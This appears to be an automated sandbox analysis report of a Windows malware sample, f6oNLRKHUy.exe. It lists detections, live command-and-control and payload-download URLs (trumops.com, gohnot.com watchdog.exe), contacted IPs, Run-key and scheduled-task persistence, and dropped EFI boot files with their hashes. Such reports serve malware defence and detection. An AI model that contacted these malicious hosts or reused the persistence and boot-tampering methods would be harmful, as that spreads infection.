            3.2.f6oNLRKHUy.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            8.2.csrss.exe.11c06000.10.unpack100%AviraTR/Patched.Ren.GenDownload File
            16.2.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.2.f6oNLRKHUy.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            42.0.windefender.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            8.2.csrss.exe.11b86000.9.unpack100%AviraTR/Patched.Ren.GenDownload File
            31.0.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            8.2.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            16.0.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            37.0.windefender.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            42.2.windefender.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            27.2.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            24.0.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            3.0.f6oNLRKHUy.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            20.2.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            27.0.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            38.2.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            8.0.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            37.2.windefender.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            24.2.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            20.0.csrss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://retoti.comidentifier0%Avira URL Cloudsafe
            https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta0%Avira URL Cloudsafe
            https://server12.trumops.com/bots/post-ia-data?uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460100%Avira URL Cloudmalware
            https://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125563209-4053062332-10020%Avira URL Cloudsafe
            https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:0%URL Reputationsafe
            https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125560%Avira URL Cloudsafe
            http://gais.cs.ccu.edu.tw/robot.php)Gulper0%Avira URL Cloudsafe
            https://server12.trumops.com/api/pollserver12.trumops.com100%Avira URL Cloudmalware
            https://logs.trumops.com100%Avira URL Cloudmalware
            http://www.spidersoft.com)Wget/1.90%Avira URL Cloudsafe
            https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic0%Avira URL Cloudsafe
            https://retoti.com0%Avira URL Cloudsafe
            https://trumops.comif-unmodified-sinceillegal0%Avira URL Cloudsafe
            http://help.ya0%Avira URL Cloudsafe
            https://server12.trumops.com/api/cdn?c=177c2a906396ff21&uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460100%Avira URL Cloudmalware
            http://devlog.gregarius.net/docs/ua)Links0%URL Reputationsafe
            https://server12.trumops.comer:0%Avira URL Cloudsafe
            https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS0%Avira URL Cloudsafe
            https://runmodes.com/api/log0%Avira URL Cloudsafe
            http://grub.org)Mozilla/5.00%Avira URL Cloudsafe
            http://www.everyfeed.c0%Avira URL Cloudsafe
            https://trumops.com100%Avira URL Cloudmalware
            http://www.exabot.com/go/robot)Opera/9.800%URL Reputationsafe
            http://www.googlebot.com/bot.html)Links0%URL Reputationsafe
            http://gohnot.com/0281c43f36eb9f47aab5357d48bbc076/watchdog.exe100%Avira URL Cloudmalware
            https://humisnee.com/sbmstart.phpindefinite0%Avira URL Cloudsafe
            https://trumops.comhttps://retoti.com0%Avira URL Cloudsafe
            https://server12.trumops.com/api/poll100%Avira URL Cloudmalware
            https://server12.trumops.comserver12.trumops.com:443server12.trumops.com:443tcpserver12.trumops.com0%Avira URL Cloudsafe
            https://logs.trumops.comhttps://runmodes.com/api/loghttps://server12.trumops.comDistributorIDCampaig0%Avira URL Cloudsafe
            https://trumops.com/api/install-failureinvalid100%Avira URL Cloudmalware
            https://runmodes.com/api/logGlobal0%Avira URL Cloudsafe
            http://gohnot.com/0281c43f36eb9f47aab5357d48bbc076100%Avira URL Cloudmalware
            http://https://_bad_pdb_file.pdb0%Avira URL Cloudsafe
            https://server12.trumops.comc=177c2a906396ff21&uuid=server12.trumops.com:443server12.trumops.com:4430%Avira URL Cloudsafe
            https://server12.trumops.com100%Avira URL Cloudmalware
            http://www.bloglines.com)F0%Avira URL Cloudsafe
            http://misc.yahoo.com.cn/he0%Avira URL Cloudsafe
            http://newscommer.com/app/app.exe100%URL Reputationmalware
            https://blockchain.infoindex0%URL Reputationsafe
            https://sitescore.aiValue0%Avira URL Cloudsafe
            http://www.avantbrowser.com)MOT-V9mm/00.620%Avira URL Cloudsafe
            https://server12.trumops.comserver12.trumops.com:443onserver12.trumops.com:443tcpserver12.trumops.co0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            runmodes.com
            104.21.34.203
            truefalse
              high
              server12.trumops.com
              104.21.79.9
              truefalse
                high
                gohnot.com
                104.21.92.165
                truefalse
                  high
                  8cf49c60-c834-48e4-bacd-9cc30e6a4460.uuid.trumops.com
                  unknown
                  unknownfalse
                    high
                    trumops.com
                    unknown
                    unknownfalse
                      high
                      logs.trumops.com
                      unknown
                      unknownfalse
                        high
                        e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
                        unknown
                        unknownfalse
                          high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://server12.trumops.com/bots/post-ia-data?uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460true
                          • Avira URL Cloud: malware
                          unknown
                          https://server12.trumops.com/api/cdn?c=177c2a906396ff21&uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460true
                          • Avira URL Cloud: malware
                          unknown
                          https://runmodes.com/api/logfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://gohnot.com/0281c43f36eb9f47aab5357d48bbc076/watchdog.exetrue
                          • Avira URL Cloud: malware
                          unknown
                          https://server12.trumops.com/api/polltrue
                          • Avira URL Cloud: malware
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://retoti.comidentifiercsrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://search.msn.com/msnbcsrss.exefalse
                            high
                            https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInstaf6oNLRKHUy.exe, 00000001.00000002.362354641.000000001186B000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125563209-4053062332-1002f6oNLRKHUy.exe, 00000001.00000002.362513862.0000000011892000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:csrss.exefalse
                            • URL Reputation: safe
                            unknown
                            https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556csrss.exe, 00000010.00000002.392292944.0000000011814000.00000004.00000001.sdmp, csrss.exe, 00000014.00000002.393573476.000000001180C000.00000004.00000001.sdmp, csrss.exe, 00000018.00000002.408700688.00000000118CE000.00000004.00000001.sdmp, csrss.exe, 0000001B.00000002.409398397.000000001180C000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.429012789.0000000011814000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://gais.cs.ccu.edu.tw/robot.php)Gulpercsrss.exefalse
                            • Avira URL Cloud: safe
                            unknown
                            https://server12.trumops.com/api/pollserver12.trumops.comcsrss.exe, 00000008.00000002.629064382.000000001180A000.00000004.00000001.sdmp, csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://logs.trumops.comcsrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://www.google.com/bot.html)tls:csrss.exefalse
                              high
                              http://www.spidersoft.com)Wget/1.9csrss.exefalse
                              • Avira URL Cloud: safe
                              low
                              https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMicf6oNLRKHUy.exe, 00000003.00000002.372262046.00000000118DA000.00000004.00000001.sdmp, csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.392222858.000000001180E000.00000004.00000001.sdmp, csrss.exe, 00000014.00000002.393591108.0000000011810000.00000004.00000001.sdmp, csrss.exe, 00000018.00000002.408613248.00000000118BE000.00000004.00000001.sdmp, csrss.exe, 0000001B.00000002.409426862.0000000011810000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.428953235.0000000011810000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              https://retoti.comf6oNLRKHUy.exe, 00000001.00000002.362354641.000000001186B000.00000004.00000001.sdmp, f6oNLRKHUy.exe, 00000003.00000002.372262046.00000000118DA000.00000004.00000001.sdmp, csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.392222858.000000001180E000.00000004.00000001.sdmp, csrss.exe, 00000014.00000002.393591108.0000000011810000.00000004.00000001.sdmp, csrss.exe, 00000018.00000002.408613248.00000000118BE000.00000004.00000001.sdmp, csrss.exe, 0000001B.00000002.409426862.0000000011810000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.428953235.0000000011810000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://trumops.comif-unmodified-sinceillegalf6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://help.yacsrss.exefalse
                              • Avira URL Cloud: safe
                              unknown
                              http://devlog.gregarius.net/docs/ua)Linkscsrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://server12.trumops.comer:csrss.exe, 00000008.00000002.631848636.0000000011ADC000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOSf6oNLRKHUy.exe, 00000001.00000002.362274050.0000000011850000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://grub.org)Mozilla/5.0csrss.exefalse
                              • Avira URL Cloud: safe
                              low
                              http://www.everyfeed.ccsrss.exefalse
                              • Avira URL Cloud: safe
                              unknown
                              https://turnitin.com/robot/crawlerinfo.html)gentracebackcsrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpfalse
                                high
                                https://trumops.comcsrss.exe, 00000008.00000002.629425005.0000000011850000.00000004.00000001.sdmp, csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.392222858.000000001180E000.00000004.00000001.sdmp, csrss.exe, 00000014.00000002.393591108.0000000011810000.00000004.00000001.sdmp, csrss.exe, 00000018.00000002.408613248.00000000118BE000.00000004.00000001.sdmp, csrss.exe, 0000001B.00000002.409426862.0000000011810000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.428953235.0000000011810000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://builtwith.com/biup)csrss.exefalse
                                  high
                                  http://www.exabot.com/go/robot)Opera/9.80csrss.exefalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.googlebot.com/bot.html)Linkscsrss.exefalse
                                  • URL Reputation: safe
                                  unknown
                                  http://search.msn.com/msnbot.htm)net/http:csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpfalse
                                    high
                                    https://humisnee.com/sbmstart.phpindefinitecsrss.exefalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://trumops.comhttps://retoti.comcsrss.exe, 00000008.00000002.630136783.00000000118D4000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://server12.trumops.comserver12.trumops.com:443server12.trumops.com:443tcpserver12.trumops.comcsrss.exe, 00000008.00000002.631242583.00000000119D6000.00000004.00000001.sdmp, csrss.exe, 00000008.00000002.631592443.0000000011A86000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    low
                                    http://search.msn.com/msnbot.htm)msnbot/1.1csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpfalse
                                      high
                                      https://logs.trumops.comhttps://runmodes.com/api/loghttps://server12.trumops.comDistributorIDCampaigcsrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://trumops.com/api/install-failureinvalidcsrss.exetrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://www.archive.org/details/archive.org_bot)Opera/9.80csrss.exefalse
                                        high
                                        http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpfalse
                                          high
                                          http://yandex.com/bots)Opera/9.51csrss.exefalse
                                            high
                                            http://www.google.com/bot.html)Mozilla/5.0csrss.exefalse
                                              high
                                              https://runmodes.com/api/logGlobalcsrss.exe, 00000008.00000002.630136783.00000000118D4000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://gohnot.com/0281c43f36eb9f47aab5357d48bbc076csrss.exe, 00000008.00000003.413719925.00000000118F6000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://https://_bad_pdb_file.pdbf6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              low
                                              https://server12.trumops.comc=177c2a906396ff21&uuid=server12.trumops.com:443server12.trumops.com:443csrss.exe, 00000008.00000002.631653082.0000000011A9E000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: safe
                                              low
                                              http://archive.org/details/archive.org_bot)Mozilla/5.0csrss.exefalse
                                                high
                                                https://server12.trumops.comcsrss.exe, 00000008.00000002.631653082.0000000011A9E000.00000004.00000001.sdmp, csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmptrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.bloglines.com)Fcsrss.exefalse
                                                • Avira URL Cloud: safe
                                                low
                                                http://misc.yahoo.com.cn/hecsrss.exefalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://newscommer.com/app/app.execsrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmptrue
                                                • URL Reputation: malware
                                                unknown
                                                http://www.google.com/feedfetcher.html)HKLMcsrss.exefalse
                                                  high
                                                  https://blockchain.infoindexcsrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.baidu.com/search/spidecsrss.exefalse
                                                    high
                                                    http://yandex.com/bots)Opera/9.80csrss.exefalse
                                                      high
                                                      https://sitescore.aiValuecsrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.avantbrowser.com)MOT-V9mm/00.62csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      low
                                                      http://search.msn.com/msnbot.htm)pkcs7:f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpfalse
                                                        high
                                                        http://www.alexa.com/help/webmasters;csrss.exefalse
                                                          high
                                                          http://www.google.com/adsbot.html)Encounteredcsrss.exefalse
                                                            high
                                                            https://server12.trumops.comserver12.trumops.com:443onserver12.trumops.com:443tcpserver12.trumops.cocsrss.exe, 00000008.00000002.629425005.0000000011850000.00000004.00000001.sdmptrue
                                                            • Avira URL Cloud: safe
                                                            low

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            172.67.139.144
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            104.21.34.203
                                                            runmodes.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            104.21.92.165
                                                            gohnot.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            104.21.79.9
                                                            server12.trumops.comUnited States
                                                            13335CLOUDFLARENETUSfalse

                                                            Private

                                                            IP
                                                            192.168.2.1
                                                            127.0.0.1

                                                            General Information

                                                            Joe Sandbox Version:33.0.0 White Diamond
                                                            Analysis ID:506223
                                                            Start date:20.10.2021
                                                            Start time:12:37:41
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 15m 7s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Sample file name:f6oNLRKHUy.exe
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:54
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.rans.troj.evad.winEXE@51/17@13/6
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 98.7% (good quality ratio 80.1%)
                                                            • Quality average: 58.5%
                                                            • Quality standard deviation: 36.8%
                                                            HCA Information:Failed
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .exe
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                                                            • Excluded IPs from analysis (whitelisted): 23.203.67.116, 93.184.220.29, 20.199.120.85, 20.82.210.154, 20.199.120.151, 40.112.88.60, 20.54.110.249, 80.67.82.235, 80.67.82.211, 20.198.162.76, 23.211.4.86
                                                            • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, cdn.onenote.net.edgekey.net, wns.notify.trafficmanager.net, ocsp.digicert.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, e1553.dspg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/506223/sample/f6oNLRKHUy.exe

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            12:38:43API Interceptor10x Sleep call for process: f6oNLRKHUy.exe modified
                                                            12:38:51API Interceptor17x Sleep call for process: csrss.exe modified
                                                            12:38:54Task SchedulerRun new task: csrss path: C:\Windows\rss\csrss.exe
                                                            12:38:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run FragrantButterfly "C:\Windows\rss\csrss.exe"
                                                            12:39:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run FragrantButterfly "C:\Windows\rss\csrss.exe"
                                                            12:39:45API Interceptor12x Sleep call for process: svchost.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            No context

                                                            Domains

                                                            No context

                                                            ASN

                                                            No context

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            B:\EFI\Boot\old.efi (copy)
                                                            Process:C:\Windows\rss\csrss.exe
                                                            File Type:MS-DOS executable
                                                            Category:dropped
                                                            Size (bytes):7680
                                                            Entropy (8bit):4.486535052248291
                                                            Encrypted:false
                                                            SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                            MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                            SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                            SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                            SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Reputation:unknown
                                                            Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                            B:\EFI\Microsoft\Boot\fw.efi (copy)
                                                            Process:C:\Windows\rss\csrss.exe
                                                            File Type:MS-DOS executable
                                                            Category:dropped
                                                            Size (bytes):7680
                                                            Entropy (8bit):4.486535052248291
                                                            Encrypted:false
                                                            SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                            MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                            SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                            SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                            SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Reputation:unknown
                                                            Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                            C:\EFI\Boot\EfiGuardDxe.efi
                                                            Process:C:\Windows\rss\csrss.exe
                                                            File Type:MS-DOS executable
                                                            Category:dropped
                                                            Size (bytes):279552
                                                            Entropy (8bit):4.553173975914215
                                                            Encrypted:false
                                                            SSDEEP:3072:ekODsOuozgl9aXsRzZZZZrUhFapDL4k2yntc:ekeklesRD6yt
                                                            MD5:2B84CB96AE6280C2020FA46E4A8A07D8
                                                            SHA1:E920E40CFC0C6A805D657C8F23F9C0612CD39F59
                                                            SHA-256:01E86A4DFE6E0DE7857B3CF2FAFD041C8B3A3241E00844CB6BFBD3BFAE2D36BC
                                                            SHA-512:F1A6598116F78FBA1F9531301A7313AC204BAB3B7AEBC299F69F2ED406F4EDAFC3410DB860E93D0DC7C24398F5A7FF595764400F31A3A06679FD6EC0EFB116D9
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Reputation:unknown
